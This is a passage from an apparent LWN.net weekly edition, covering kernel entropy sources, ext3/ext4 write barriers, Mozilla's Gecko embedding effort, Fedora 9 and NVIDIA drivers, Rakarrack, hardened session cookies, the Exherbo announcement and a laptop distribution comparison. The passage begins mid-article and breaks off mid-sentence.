Part of the problem stems from a misconception about random numbers
gotten from /dev/random versus those that are read from
/dev/urandom, which we described in a Security page
article last December. In general, applications should read from
/dev/urandom.  Only the most sensitive uses of random
numbers—keys for GPG for example—need the entropy guarantee
that /dev/random provides.  In a system that is getting regular
entropy updates, the quality of the random numbers from both sources is the same.


There is still an initialization problem for some systems, though, as Ted
Ts'o points out:

Hence, if you don't think the system hasn't run long enough to collect
significant entropy, you need to distinguish between "has run long
enough to collect entropy which is causes the entropy credits using a
somewhat estimation system where we try to be conservative such that
/dev/random will let you extract the number of bits you need", and
"has run long enough to collect entropy which is unpredictable by an
outside attacker such that host keys generated by /dev/urandom really
are secure".


A potential entropy source, even for embedded systems, is to sample
other kernel and system parameters that are not predictable externally.
Garzik suggests: 


EGD demonstrates this, for example:  http://egd.sourceforge.net/  It
looks 
at snmp, w, last, uptime, iostats, vmstats, etc.

And there are plenty of untapped entropy sources even so, such as reading
temperature sensors, fan speed sensors on variable-speed fans, etc.

Heck, "smartctl -d ata -a /dev/FOO" produces output that could be hashed
and added as entropy.


Another source is from hardware random number generators.  The kernel
already has support for some, including the VIA
Padlock that seems to be well thought of.  Not all processors have such
support, however. The Trusted
Platform Module (TPM) does have random number generation and is
becoming more widespread, especially in laptops, but there is no kernel
hw_random driver for TPM.


Garzik advocates adding a kernel driver for what he calls the "Treacherous
Platform Module", but as others pointed out, it can all be done in user
space using the TrouSerS
library.  Even for the hardware random number generators that are supported
in the kernel there is no automatic entropy collection, as it is left up to
user space to decide whether to do that.  This is done to try and keep
policy decisions about the quality of the random data out of kernel code.


Systems that wish to sample that data should use rngd to feed the
kernel entropy pool.  rngd will apply FIPS 140-2 tests to
verify the randomness of the data before passing it to the kernel.  Andi
Kleen is not in favor of that approach:

Just think a little bit: system has no randomness source except the
hardware RNG. you do your strange randomness verification. if it fails
what do you do? You don't feed anything into your entropy pool and all
your  random output is predictable (just boot time)  If you add anything
predictable from another source it's still predictable, no difference.


There is concern that some of the hardware random number generators are
poorly implemented or could malfunction, so it would be dangerous to
automatically add that data into the pool.  Doing the FIPS testing in the
kernel is not an option, leaving it up to user space applications to make
the decision.  There is nothing stopping any superuser process from adding bits
to the entropy pool—no matter how weak—but the consensus is that the
kernel itself must use sources it knows it can trust.


Another instance of this problem—in a different guise—appears in a discussion about random numbers for virtualized I/O, with Garzik asking: "Has anyone yet written a "hw" RNG
module for virt, that reads the host's
random number pool?"  Rusty Russell responded with a patch for a virtio "hardware"
random number generator as well as one that adds it into his lguest 
hypervisor.  The lguest patch reads data from the host's
/dev/urandom, 
which is not where H. Peter Anvin thinks it
should come from:

There is no point in feeding the host /dev/urandom to the guest (except
for seeding, which can be handled through other means); it will do its
own mixing anyway.  The reason to provide anything at all from the host
is to give it "golden" entropy bits.


The virtio implementation only provides the hw_random
implementation, thus it requires user space help to get entropy data into
the kernel.  Much like any process that can read /dev/random,
lguest could exhaust the host entropy pool, so there was some discussion of
limiting how much random data guests can request from the device.  A guest
implementation could then use a small pool of entropy read from the host to
seed its own random number generator for the simulated hardware device.


Removing the last remaining uses of IRQF_SAMPLE_RANDOM in network
drivers seems likely, though some way to mix that data into the entropy
pool without giving it any credit is still a possibility.  With luck, that
will encourage more effort into incorporating new sources of entropy using
tools like EGD or, for systems that have it available, random number
hardware.  For systems that lack the traditional entropy sources, this
should lead to a better initialized and fuller pool, while eliminating a
potential attack by way of network packet manipulation.


		Barriers and journaling filesystems


Journaling filesystems come with a big promise: they free system
administrators from the need to worry about disk corruption resulting from
system crashes.  It is, in fact, not even necessary to run a filesystem
integrity checker in such situations.  The real world, of course, is a
little messier than that.  As a recent discussion shows, it may be even
messier than many of us thought, with the integrity promises of
journaling filesystems being traded off against performance.


A filesystem like ext3 works by maintaining a journal on a dedicated
portion of the disk.  Whenever a set of filesystem metadata changes are to
be made, they are first written to the journal - without changing the rest
of the filesystem.  Once all of those changes have been journaled, a
"commit record" is added to the journal to indicate that everything else
there is valid.  Only after the journal transaction has been committed in
this fashion can the kernel  do the real metadata writes at its leisure;
should the system crash in the middle, the information needed to safely
finish the job can be found in the journal.  There will be no filesystem
corruption caused by a partial metadata update.  

There is a hitch, though: the filesystem code must, before writing the
commit record, be absolutely sure that all of the transaction's information
has made it to the journal.  Just doing the writes in the proper order is
insufficient; contemporary drives maintain large internal caches and will
reorder operations for better performance.  So the filesystem must
explicitly instruct the disk to get all of the journal data onto the media
before writing the commit record; if the commit record gets written first,
the journal may be corrupted.  The kernel's block I/O subsystem makes this
capability available through the use of barriers; in essence, a barrier forbids the
writing of any blocks after the barrier until all blocks written before the
barrier are committed to the media.  By using barriers, filesystems can
make sure that their on-disk structures remain consistent at all times.


There is another hitch: the ext3 and ext4 filesystems, by default, do not
use barriers.  The option is there, but, unless the administrator has
explicitly requested the use of barriers, these filesystems operate
without them - though some distributions (notably SUSE) change that default.
Eric Sandeen recently decided that this was not the best situation, so he
submitted a patch changing
the default for ext3 and ext4.  That's when the discussion started.

Andrew Morton's response tells a lot about
why this default is set the way it is:


	Last time this came up lots of workloads slowed down by 30% so I
	dropped the patches in horror.  I just don't think we can quietly
	go and slow everyone's machines down by this much...
	
	There are no happy solutions here, and I'm inclined to let this dog
	remain asleep and continue to leave it up to distributors to decide
	what their default should be.


So barriers are disabled by default because they have a serious impact on
performance.  And, beyond that, the fact is that people get away with
running their filesystems without using barriers.  Reports of ext3
filesystem corruption are few and far between.

It turns out that the "getting away with it" factor is not just luck.  Ted
Ts'o explains what's going on: the journal
on ext3/ext4 filesystems is normally contiguous on the physical media.  The
filesystem code tries to create it that way, and, since the journal is
normally created at the same time as the filesystem itself, contiguous
space is easy to come by.  Keeping the journal together will be good for
performance, but it also helps to prevent reordering.  In normal usage, the
commit record will land on the block just after the rest of the journal
data, so there is no reason for the drive to reorder things.  The commit
record will naturally be written just after all of the other journal log
data has made it to the media.

That said, nobody is foolish enough to claim that things will always happen
that way.  Disk drives have a certain well-documented tendency to stop
cooperating at inopportune times.  Beyond that, the journal is essentially
a circular buffer; when a transaction wraps off the end, the commit record
may be on an earlier block than some of the journal data.  And so on.  So
the potential for corruption is always there; in fact, Chris Mason has a torture-test program which can make it happen
fairly reliably.  There can be no doubt that running without barriers is
less safe than using them.


Anybody can turn on barriers if they are willing to take the performance
hit.  Unless, of course, their filesystem is based on an LVM volume (as
certain distributions do by default); it turns out that the device mapper
code does not pass through or honor barriers.  But, for everybody else, it
would be nice if that 
performance cost could be reduced somewhat.  And it seems that might be
possible.


The current ext3 code - when barriers are enabled - performs a sequence of
operations like this for each transaction:


 The log blocks are written to the journal.
 A barrier operation is performed.
 The commit record is written.
 Another barrier is executed.
 Metadata writes begin at some later point.


On ext4, the first barrier (step 2) can be omitted because the ext4
filesystem supports checksums on the journal.  If the journal log data and
the commit record are reordered, and if the operation is interrupted by a
crash, the journal's checksum will not match the one stored in the commit
record and the transaction will be discarded.  Chris Mason suggests that it would be "mostly safe" to
omit that barrier with ext3 as well, with a possible exception when the
journal wraps around.


Another idea for making things faster is to defer barrier operations when
possible.  If there is no pressing need to flush things out, a few
transactions can be built up in the journal and all shoved out with a
single barrier.  There is also some potential for improvement by carefully
ordering operations so that barriers (which are normally implemented as
"flush all outstanding operations to media" requests) do not force the
writing of blocks which do not have specific ordering requirements.


In summary: it looks like the time has come to figure out how to make the
cost of barriers palatable.  Ted Ts'o seems to
feel that way:


	I think we have to enable barriers for ext3/4, and then work to
	improve the overhead in ext4/jbd2.  It's probably true that the
	vast majority of systems don't run under conditions similar to what
	Chris used to demonstrate the problem, but the default has to be
	filesystem safety.


Your editor's sense is that this particular
dog is now wide awake and is likely to bark for some time.  That may
disturb some of the neighbors, but it's better than letting somebody get
bitten later on.

		Mozilla looks to simplify embedding


There has been a longstanding complaint about the difficulty in embedding
Mozilla into other applications, but an effort is underway to change that.
Mozilla evangelist Christopher Blizzard is coordinating a group of
interested developers to redefine the application programming interfaces
(APIs), libraries, and 
embedding "story" to try to make it easier for other applications.  Mozilla
is leading the way, but they want to build a community around embedding, so
they are reaching out to developers that wish to
help guide the effort.  


Embedding the Gecko
rendering engine—the guts of Mozilla's web 
content handling—will allow separate programs to deal with and use
the web without writing the code themselves.  New applications can
leverage all of the work done by Mozilla to handle HTML, CSS, Javascript,
etc. to concentrate on their specific task.  There are several embedding use
cases cited on the Mozilla wiki, but the focus of this new effort has
been on applications where handling web content is just part of the task at
hand. 


To some extent, this effort is probably being
driven by the rise of
WebKit, which has a specific focus on being embeddable.
WebKit is derived from the KHTML rendering engine—which underlies
Konqueror—as modified by Apple for their Safari browser.  There has
been a fair amount of press about WebKit lately, which, along with the
defection of the Epiphany browser from Gecko to WebKit, may have given
Mozilla more motivation to make Gecko more embeddable. 


Two meetings have occurred so far to discuss and plan a strategy for
providing better embedding support.  Blizzard has a lengthy report from the
first 
which goes into some detail about the direction they are headed.  The other
was held in early
May, but there are no reports from that as yet.  This a young project
that is looking for more interested folks to get involved.


One of the larger complaints about trying to embed Gecko into other
applications is that there are multiple ways to do it.  It is difficult for
a developer to know which is right for their application.  Blizzard says:


Sometimes you use libxul, sometimes you use the win32 embedding widget,
sometimes you use the gtk embedding widget, sometimes you have to reach
down into internal interfaces to change things and some times you
don't. Having a single story around how to make use of the embedding APIs
on your platform and in your environment is one of our goals.


Another area that needs work is providing a stable API.  One of the
downsides to not having stability at the API or application binary
interface (ABI) is that security holes in Gecko tend to cascade throughout all the
other applications that use it.  But Blizzard does not expect to nail down
the API right away:

So we will have some iteration during early development and will start
locking things down once we have a better sense of what people [want] and what
we'll need to change internally once we understand about our user's
specific use cases. Stable API is a goal, but it's a longer goal. The more
that we have people help us understand and contribute code out of the gate
the faster we will get here. 


The diagram at right gives an overview of how the new API will fit.  There
is existing code at both the top and bottom of the diagram, while most the
of the middle is new.  Applications will be able to use some of the
embedded functionality through platform-specific APIs—for GNOME,
Windows, or OS X—or write directly to
the new embedding APIs for more capabilities.  One of the more interesting
decisions is to use the existing APIs as a model, but not for creating a
fully compatible implementation.  Blizzard
explains:

Note that trying to be a drop in replacement to WebKit or MSHTML/WebBrowser
Control is not on the table. Therein lies madness. You end up chasing
compatibility instead of just trying to make something that works really
really well. But we can learn what works well from them and what doesn't
and hopefully apply that to our new embedding interfaces.


The project has started on a roadmap of features that need to be worked on,
beginning with the basics.  Reorganizing the libraries and header files to
create a software development kit (SDK) is high on that list.  One of the
bigger issues that needs to be addressed is how to handle profiles—the
directory (i.e. $HOME/.mozilla) that Mozilla uses for
user-specific data storage.  Some use cases will want to run without a
profile, but the current code expects to always have one available.  The
full list in the meeting report is worth a read.


This is an interesting project that should lead to more interesting
applications down the road.  The barriers to working with Gecko today are 
fairly high, but the advantages to using a well-tested, well-supported,
and reasonably fast rendering
engine for applications that need it are compelling.  Those barriers look
to be lowering in the not-too-distant future.


		Blame Fedora.  Again.


As your editor writes, the Fedora development list is the scene of an
extended, heated discussion about Fedora 9.  One might think that some
users would be unhappy about the inclusion of KDE 4, say, or maybe
it's an issue with Firefox 3, with its refusal to run older extensions
and persistent fsync() bug.
It would not be hard to imagine users being upset by the continued presence
of Codeina.  In fact, nobody seems to have much to say about those issues.
Instead, a small group of very vocal users is complaining about the X
Window System.


That, too, might not be completely beyond imagination.  Your editor can
certainly attest that Rawhide users had more than their share of X-related
fun over the course of the Fedora 9 development cycle.  The
interesting thing, though, is that just about all of the problems reported
by Rawhide users got fixed before the final release.  So, while
Fedora 9 has a lot of very new X infrastructure, it seems to be
fairly solid infrastructure.


The problem, instead, is that NVIDIA has not shipped a version of its
binary-only graphics driver which works on Fedora 9.  These vocal
users feel that the Fedora Project has done them a major disservice by
shipping a release without an NVIDIA-compatible X server.  Instead, they
say, Fedora should either have declined to ship a "pre-release" server, or
it should provide a separate set of packages with an older server for
NVIDIA users.  NVIDIA seems
to agree:


	Fedora 9 is shipping a pre-release X server. If you can't wait for
	an updated NVIDIA graphics driver and the limited support provided
	in 173.08 graphics driver release is insufficient for your
	purposes, please use the X.Org nv driver or fall back to a
	supported distribution.


There are a few responses to be made to this set of claims, starting with
the "pre-release" bit.  The server is only "pre-release" by a relatively
short period of time, and, more importantly, the ABI for this server
release has been frozen for a few months now.  The X developers have made
it clear that the ABI will not change before the 1.5 release ships.  So
there's no real reason why NVIDIA could not release a driver if it chose to
do so.

But NVIDIA has not so chosen.  More to the point, NVIDIA has implemented a
clear policy of not releasing drivers for a given X version until that
version appears in a stable release by a major distribution.  This is a
policy which forces some distributor to ship a version of X which is not
supported by NVIDIA.  Criticizing a distribution like Fedora for being the
first one out with a new X version seems misplaced; if one is averse to the
use of new software, there are probably better distributions to be running.

But what about the compatibility packages request?  Beyond the inconvenient
fact that putting resources into supporting proprietary software is contrary
to Fedora's policies, that sort of support is expensive to provide.  See Adam Jackson's response for a blunt summary of
just how expensive.  If Fedora developers start putting their time into
that sort of project, they will be putting less time into making Fedora
itself better.  This does not seem like a good tradeoff for Fedora users
who, after all, have chosen a distribution with a "100% free software"
policy. 

And, certainly, some Fedora users appreciate the priorities that the developers
have taken:


	Well I'm an Intel &amp; Radeon user and Xorg in F9 is dramatically
	better better for all my machines. So, yes, if new code improves
	life for the open source drivers, lets do this again &amp; again in
	future releases. I don't want my desktop experience held hostage by
	one company with binary drivers.


In fact, X has gotten significantly better, and it has gotten better more
quickly as a result of Fedora's decision to go with the upcoming release.
Any attempt to maintain compatibility with proprietary drivers would, at
best, slow that progress down significantly.

Users unquestionably have the right to hook binary-only drivers into their
systems.  But ensuring that those drivers work with current free software
is their problem - not the free software developers' problem.  The use of
proprietary software may have some advantages for some people, but it does
put users at the mercy of the only people who can fix or update that
software: the software's owner.  Most developers (most!) do not overtly
wish to make life 
difficult for users of binary drivers.  But asking them to go out of their
way to shield binary driver users from the decisions made by their vendors
is not just excessive; it actively risks making things worse for free
software users.

Anybody who wants to criticize Fedora can certainly find any number of
valid things to gripe about.  Your editor would start with the two
obnoxious PackageKit icons which materialized on the GNOME panel, and
which, it seems, cannot be made to go away without the application of a
fair amount of dynamite.  Why does a Rawhide user need a constant reminder
that there are updates available?  But the failure to provide an
NVIDIA-compatible X server does not seem like an appropriate thing to
complain about.  One should not blame Fedora for being free software.

		Use Rakarrack for Electric Guitar Effects


Rakarrack
is a new GUI-based application that can turn a Linux machine into
a collection of audio effects for use in the making of music.
The developers include Josep Andreu, Daniel Vidal and
Hernán Ordiales with help from other individuals.
Rakarrack version 0.1.2 was recently
announced,
it appears to be the first public release.
From the project's web page:


Rakarrack is a guitar effects processor for GNU / Linux simple and easy to use but it contains features that make it unique in this field of applications. It contains 10 effects: Linear Equalizer, Parametric Equalizer, Compressor, Distorsion, Overdrive, Echo, Chorus, Phaser, Flanger and Reverb. It integrates a tuner and a MIDI converter (experimental). It can also be handled by an external MIDI controller. The settings designed by the user can be stored in presets and these presets can be used to create banks of effects.


The README file in the source code has some information on the
motivation behind the project:
"This app born after an informal conversation about effects for guitar
over GNU/linux. The major part of this apps are discontinued or simply
not have new versions after few years. Josep Andreu say on the IRC chat
"I can made an app based on the effects set hid[d]en on code of
ZynAddSubFX (by Paul Nasca Octavian). Some time after here is the
result of our work..."

<!-- LWNPutAdHere -->

The project

screen shots show the GUI layout and various color schemes.
Compared to a typical hardware audio processor, the GUI has big
advantages over the usual LCD display that most effect units have.
One need not hunt around a pushbutton-controlled memory to view and
change the many adjustable parameters and the system disk provides
nearly unlimited configuration storage possibilities.
To hear Rakarrac in action, listen to the
demo
by Carlos Pino (ogg format).


One might wonder if audio effects processors will soon follow
mobile phones, TiVo-like video recorders and consumer-based audio
recorders in the transition from proprietary operating systems to
Linux-based embedded systems.
Such a system could be put together with a small Linux-compatible
embedded platform, an LCD interface such as
LCDproc
(with the aforementioned UI limitations),
keyboard and audio interfaces and some DSP software similar to
Rakarrac.  In the mean time, if you have a need for a versatile
hardware effector and can spare some CPU cycles, Rakarrac may be
an effective solution.  The software is available for download

here.


		Session cookies for web applications


Two weeks ago on this page, we reported on some Wordpress
vulnerabilities that were caused by incorrectly generating
authentication cookies.  The article was a bit light on details about such
cookies, so this follow-up hopes to remedy that.  In addition, Steven
Murdoch, who discovered both of the holes, recently presented
a paper on a new cookie technique that provides some additional
safeguards over other schemes.


HTTP is a stateless protocol which means that any application that wishes
to track multiple requests as a single session must provide its own way to
link those requests.  This is typically done through cookies, which are
opaque blobs of data that are stored by browsers.  Cookies are sent to the
browser as part of an HTTP response, usually after some kind of
authentication is successful.  The browser associates the cookie with the
URL of the site so that it can send the cookie value back to the server on
each subsequent request.   


Servers can then use the value as a key into some kind of persistent
storage so that all requests that contain that cookie value are treated as
belonging to a particular session.  In particular, it represents that the
user associated with that session has correctly authenticated.
The cookie lasts until it expires or is
deleted by the user.  When that happens, the user must re-authenticate to
get a new cookie which also starts a new session.  Users find this annoying
if it happens too frequently, so expirations are often quite long.


If the user explicitly logs out of the application, any server-side
resources that are being used to store state information can be freed, but
that is often not the case.  Users will generally just close their browser (or
tab) while still being logged in.  It is also convenient for users to be
allowed multiple concurrent sessions, generally from multiple computers,
which will cause the number of sessions stored to be larger, perhaps much
larger, than the number of users.


Applications could restrict the number of sessions allowed by a user, or
ratchet the expiration value way down, but they typically do not for user
convenience.  This allows for a potential denial of service when an
attacker creates so many sessions that the server runs out of persistent
storage.  For this reason, stateless
session cookies [PDF] were created.  


Stateless session cookies store all of the state information in the cookie
itself, so that the server need not keep anything in the database,
filesystem, or memory.  The data in the cookie must be encoded in such a
way that they cannot be forged, otherwise attackers could create cookies
that allow them access they should not have.  This is essentially where
Wordpress went wrong.  By not implementing stateless session cookies
correctly,  a valid cookie for one user could be
modified into a valid cookie for a different user. 


A stateless session cookie has the state data and expiration "in the clear"
followed by a secure hash (SHA-256 for example) of those same values along
with a key known only by the server.  When the server receives the cookie
value, it can calculate the hash and if it matches, proceed to use the
state information.  Because the secret is not known, an attacker cannot
create their own cookies with values of their choosing.


The other side of that coin is that an attacker can create spoofed
cookies if they know the secret.  Murdoch wanted to extend the concept such
that even getting access to the secret, through a SQL injection or other
web application flaw, would not feasibly allow an attacker to create a
spoofed cookie.  The result is hardened
stateless session cookies [PDF].


The basic idea behind the scheme is to add an additional field to stateless
session cookies that corresponds to an authenticator generated when an
account is first set up.  This authenticator is generated from the password
at account creation by iteratively
calculating the cryptographic hash of the password and a long salt
value.  


Salt is a random string—usually just a few characters long—that is added to a password before it gets hashed,
then stored with the password in the clear.  It is used to eliminate the use of rainbow tables to crack
passwords.  Hardened stateless session cookies use a 128-bit
salt value, then repeatedly calculate HASH(prev|salt), where
prev 
is the password the first time through and the hash value from the previous
calculation on each subsequent iteration.


The number of iterations is large, 256 for example, but not a secret.  Once
that value is calculated, it is hashed one last time, without the salt, and
then stored in the user table as the authenticator.  When the cookie value
is created after a successful authentication, only the output of the
iterative hash itself is placed in the cookie, not the authenticator that
is stored in the database.  Cookie verification then must do the standard
stateless session cookie hash verification, to ensure that the values have
not been manipulated, then hash the value in the
cookie to verify against authenticator in the database.


If it sounds complicated, it is; the performance of doing 256 hashes is
also an issue, but it does protect against the secret key being lost.
Because an attacker cannot calculate a valid authenticator value to put
in the cookie (doing so would require breaking SHA-256), they cannot create
their own spoofed cookies. 


While it is not clear that the overhead of all of these hash calculations
is warranted, it is an interesting extension to the stateless session
cookie scheme.  In his paper, Murdoch mentions some variations that could be used to further
increase the security of the technique.


		Exherbo announced. Sort of...


A new distribution called Exherbo has
announced its
existence.  It's at least partly inspired by Gentoo and has borrowed
some Gentoo code.

  Exherbo is not a Gentoo fork in the conventional sense. Although it
  shares some code with Gentoo, and although many concepts are similar, and
  although many of the people involved were or are Gentoo developers, most
  Exherbo code is rewritten from scratch.


Exherbo is not your average distribution, nor does it aspire to be.  In
fact, Exherbo is not for users at all.  Exherbo is designed to be a
developer's playground.  A place to experiment, to innovate, and to break
packages with impunity.

So far there isn't much there.  The projects page lists only
two projects so far: Arbor, an exheres-format (the Exherbo package format) repository
for base system and assorted useful packages, and Genesis, which aims to be
a replacement init daemon.

There are two mailing
lists available, the main development list and a commit mailing list.
The source repository has
some packages in git and a few more in subversion.  There's a Bugzilla bug tracker too.  So there
isn't much yet, but the infrastructure is there to support what may come.

Perhaps the most interesting part of the site for most people is the Planet Exherbo, a typical blog space
for developers to talk about what they are doing, or would like to do, or
whatever.  For example you'll find this post [warning, site is currently reported by Firefox 3 as an "Attack Site", content can also be found on the Planet site] by Anders Ossowicki which
explains:

  First of all, Exherbo was announced because some elements of it will be
  discussed at an upcoming conference. Rather than having a blank page and
  let people start various rumors it seemed wise to at least let people
  know what was going on. But in an effort not to hype it above what it
  was, we didn't hand over all available information and code.
  
  Unfortunately Slashdot picked up the announcement because some tard
  decided it would be a great idea to submit it to them. We did not do that
  ourselves because, as we state on the website, we have no need for users
  at the moment and exherbo won't fulfill users demands for the foreseeable
  future. That is not to say exherbo won't ever become useful but we're not
  there at the moment. Some very basic things still need to be worked out
  properly.


So there it is.  Do not download and expect a working distribution.  Do not
expect a release of a working distribution any time soon.  But if you are a
developer with an itch to scratch, this might be the place to so.  Just to
keep it all together, here's the original LWN announcement and all associated
comments.

		The Grumpy Editor's Guide to distributions for laptops


Laptop installation has traditionally been one of the biggest challenges
faced by Linux users.  These systems come with no end of special-purpose
hardware, and they bring particular needs of their own.  More recently,
getting a laptop into a basic, working state has become less of a challenge
- at least, for carefully-chosen systems.  Life has gotten much easier in
this area.

But a contemporary laptop user is not content with "it boots Linux."  A
well-provisioned laptop in 2008 should be able to make full use of all the
hardware, suspend and resume reliably, avoid turning presentations into
extended projector-related hassles, and get the most out of the battery.
Your editor has, in the past, proved that he could get a laptop to suspend
through a sufficient investment of his life into building kernels and
tweaking configurations.  Your editor, in the present, has little patience
for that kind of messing around.  The manual creation of power management
configurations 
should really, at this point, go the way of hand-crafting XFree86
modelines.  Both were once ways of showing one's advanced Linux skills, but
both are now just unnecessary pain.


A period of relatively little travel recently made it possible to follow
through on an old suggestion from Arjan van de Ven: install a number of
distributions on a laptop and compare how they perform.  To this end, your editor's
aging Thinkpad X31 was pressed into service with offerings from several
distributors.  In each case, a recent stable (or occasionally beta)
distribution was installed while doing a minimum of work beyond clicking
"next": no "expert" installations were done.  All available updates were
applied.  Then, a number of things were checked:


 Powertop was installed (if not 
     already present) and run to measure the steady-state power usage of the
     machine.  The laptop was as idle as your editor could get it to be,
     with the backlight at minimum brightness; the system was left long
     enough for the power usage numbers to stabilize.  The idea was to get
     the lowest possible value for each distribution.

 Suspend (to RAM) and hibernate (suspend to disk) were tested.

 Various laptop-specific buttons were tested.  The X31, for example,
     has a button combination which controls a small light which
     illuminates the keyboard.

 The wireless network adapter was tested.  The X31 presents an
     interesting complication in that it has an Atheros-based adapter,
     which, until recently, has not been supportable with free software.

 An external monitor was connected to determine how much work is
     required to drive an external projector.


During the process, any other events of note were recorded as well.

Late in the process of writing this article, your editor was lucky enough
to receive a shiny new HP 2510p laptop, thanks to the generosity of the
folks at HP (and Bdale Garbee in particular).  This machine, being based on
Intel chipsets, is fully supported by free software.  It promises to make
future travels much more pleasant; having a toy like this show up in the
mail makes it hard to maintain a grumpy
attitude.  The above tests were run on the new machine, but only for a
subset of the distributions.

Debian Lenny (unstable testing)

Your editor chose to perform this experiment with a mid-May Debian Lenny
testing release, rather than the aging stable distribution.  That installed
a system with a 2.6.22 kernel which, of course, has no ath5k driver.  So no
wireless on the X31 for Debian users - at least, not without installing the
proprietary MadWifi module.  Unsurprisingly, the Debian installer did not
offer MadWifi as an option.

Suspend works, as long as the user does not mind a corrupted display on
resume; it's possible to see enough to perform an orderly reboot, but not
much more.  It is strange that Debian would have this problem; suspend has
worked on this laptop with kernels significantly older than 2.6.22.
Hibernate was not accessible via its usual place on F12, but, when
invoked from the menus, worked properly.  Other laptop keys worked without
problem. 

The external display port did not work under Debian.  The only way to get
video out of that port is to have the monitor plugged in when the system
boots. 

Power consumption on an idle system was 10.7 watts, with the system waking
up an average of 67 times every second.  This is far from the worst power
performance your editor saw over the course of this exercise, but also far
from the best.

All told, Debian Lenny in its current form is not one of the better
systems for laptops - at least, for this particular laptop.  Some of the
other distributors have made much more progress in this area in recent
years. 

Fedora 9


The installation from the Fedora 9 DVD went without any significant
problems.  One of the nicest things about this particular distribution was
its inclusion of the ath5k driver as part of its 2.6.25 kernel.  It seems
that ath5k does not work well for all chipsets, but the X31 wireless
adapter works quite well with it.  So, with Fedora 9, the X31 laptop
works with 100% free software.

Another thing worthy of note: Fedora 9 was the only distribution tested
which offered to install the system on an encrypted disk.  Given the
frequency with which laptops are lost, encrypting the data on them seems
like something a lot of users would want to have.

Suspend and hibernate worked on this system, with one little glitch: the
backlight remained on after the system was suspended.  Your editor ran into
the same problem with Ubuntu Hardy during its development cycle; after some
conversation in Launchpad, 
the problem was quickly fixed.  So a bug has been filed in the Fedora
tracker pointing to that resolution, but no activity has been seen so far.

The power consumption for Fedora was 8.9 watts, with the processor waking
up an average of 45 times per second.  The NetworkManager applet offers a
"disable wireless" operation which, indeed, will disable the wireless
interface.  It does not power it down, though, so power consumption is
unchanged.  Actually uninstalling the ath5k 
module dropped power consumption to 8.2 watts.

Plugging into an external display worked, though it was necessary to bring
up the "screen resolution" dialog to bring up the external port.

On the 2510p, the display was run in a strange, non-native resolution
during the installation, making the text harder to read.  The installed
system, however, did not have this problem.  This system ran at 11.0 watts,
with a surprising 145 wakeups per second.  Following Powertop's advice,
your editor shut down the Bluetooth interface and the HAL CD polling
daemon, bringing power usage down to 10.1 watts.  Once again,
NetworkManager was unable to save any power by disabling the wireless.  The
hardware's wireless button did power down the interface, bringing power
usage down to 8.6 watts.  But (and this is true for all
distributions tested), NetworkManager was never able to make use of that
interface again until the system was rebooted.


All told, Fedora 9 works quite nicely for laptop installations; this
distribution has made quite a bit of progress over the last few releases.
Some grumpiness about the GNOME setup is appropriate, though.  Fedora's
hackers seem especially enamored of those dialog notifier windows which pop
up from the panel icons.  The experience is rather like trying to work
while being heckled by a sizable crowd of unhelpful bystanders.

One window, in particular, announced that closing the lid would no longer
suspend the system because some (unnamed) program was blocking that
action.  That might be useful information, but knowing which program was
getting in the way would have been more helpful.  But even more helpful
would be to not have to dismiss little notifier windows all the time.

There's also something in the GNOME system on Fedora which feels entitled
to adjust the backlight brightness anytime it thinks that the user has
screwed it up again.  This happens even after the "dim display on idle"
options have been disabled, and often results in making the display
brighter on an idle system.  If the user has set the backlight brightness,
the system should not presume to readjust it.  One should not have to
wrestle with one's computer over the brightness of the display. 


OpenSolaris

Some whim or other inspired your editor to install the OpenSolaris 200805
release.  It has been almost ten years since the last encounter with
Solaris, so, perhaps, it was time for a brief reunion.  Brief it was.

The installation procedure for this operating system is textual; it seems
rather primitive next to the effort Linux distributors have been putting
into making their installers attractive.  There is a license acceptance
stage, where the poor user gets to scroll through all of the licenses
applicable to the software in this distribution - 244 licenses in all.
There's no requirement to indicate acceptance, though.

The installed system worked with the Atheros wireless by virtue of a
binary-only driver.  Initially it only worked so well, though; this system,
from Sun "the network is the computer" Microsystems, installs itself configured to
use a local hosts file (only) for hostname lookups.  Your editor had to
manually tweak nsswitch.conf to get it to use DNS.  Sun's equivalent to
NetworkManager is the "network automagic daemon," which is obscure in spots
but seems to work.  There is no power savings to be had from turning off
the wireless interface.

On the power front, once your editor tracked down a Powertop port, the
system was seen to be drawing 11.5 watts.  Unlike with any Linux
distribution, Solaris runs the processor at its fastest speed at all times;
there does not appear to be any concept of CPU frequency control.  The
laptop fan runs constantly under Solaris.

There is no suspend capability, no hibernate.  In general, it would appear
that the Solaris developers have not put a whole lot of effort into the
power management problem so far - at least, not on x86; the OpenSolaris power
management page says that life is better with the Sparc port and that
all this goodness is coming to x86 Real Soon Now.

The external video port did not work at all under OpenSolaris.  Your editor
was charmed to notice that the Solaris folks have retained the classic "log
off now or risk your files being damaged" message in the shutdown
procedure.

On the 2510p, the OpenSolaris CD brought up GRUB, but did not succeed in
booting into the installer.

All told, OpenSolaris has some catching-up to do.  Laptops were almost
certainly not at the top of the priority list for Project Indiana, but it
is still a little discouraging to see how far behind things are.

openSUSE 11.0 Beta 3

The openSUSE development cycle is heading toward its close, so your editor
decided to go with the beta 3 release.  It must be said that this
distribution got off on rather the wrong foot; it puts up an end-user license agreement which prohibits
redistribution for compensation, bundling openSUSE with any other "offering,"
reverse engineering, transfer of the software, use in a production
environment, or publishing benchmark results (but only if you're a software
vendor).  Users are required to stop using the software upon termination of
the license, which happens after 90 days, after the next release, or
whenever Novell says so.  And, just in case one was considering the crime
of using the release for too long:


	The Software may contain an automatic disabling mechanism that
	prevents its use after a certain period of time, so You should back
	up Your system and take other measures to prevent any loss of files
	or data.


There's a certain amount of weasel-wording to the effect that Novell is not
trying to take away any rights conferred by the real licenses on the
software it ships.  So the EULA has little force.  But it is not consistent
with the mores of the community from which Novell took this software, and
it leaves a bad taste in one's mouth.

Installation is relatively straightforward, though a bit more
mouse-intensive than some other distributions.  But one has to watch carefully:
openSUSE, by default, configures the system to automatically log in
the user account created at installation time.  An amusing addition is
that, after suspending and resuming the system (which works), a password
prompt will be presented, even though none is required on a cold boot.

openSUSE, like Fedora, thinks that it's smarter than the user and is
entitled to readjust the backlight at any time.


As mentioned, suspending the system worked without trouble.  Hibernation,
however, failed; it goes straight to resume without halting the system.
openSUSE ships the ath5k driver, so the wireless interface worked
flawlessly with free software.  The external monitor port is always on
under openSUSE; the dialogs offered to create a Xinerama setup, but that
operation failed.


Power consumption was 11.2 watts, with 106 wakeups happening per second.
Your editor noticed that beagled was running; something which was not
observed on other systems.  Powertop noticed too, and politely offered to kill it
off; that brought the system down to 78 wakeups with slightly less power
used.  Removing the ath5k driver brought consumption down to 10.8 watts.


Experience with the 2510p was quite similar.  Hibernate still fails.  Power
